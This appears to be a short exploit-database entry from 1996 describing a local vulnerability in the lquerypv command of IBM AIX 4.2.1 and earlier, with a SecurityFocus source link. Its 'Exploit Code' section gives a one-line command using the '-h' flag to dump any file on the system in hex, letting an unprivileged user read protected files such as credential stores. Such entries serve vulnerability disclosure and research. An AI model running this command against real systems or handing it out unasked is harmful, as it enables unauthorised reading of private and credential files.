IBM AIX <= 4.2.1 lquerypv Vulnerability

Anonymous 24.11.1996 Verified
Local Exploits AIX

Exploit Code

source: http://www.securityfocus.com/bid/455/info

There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format. 


/usr/sbin/lquerypv -h /pathtofilename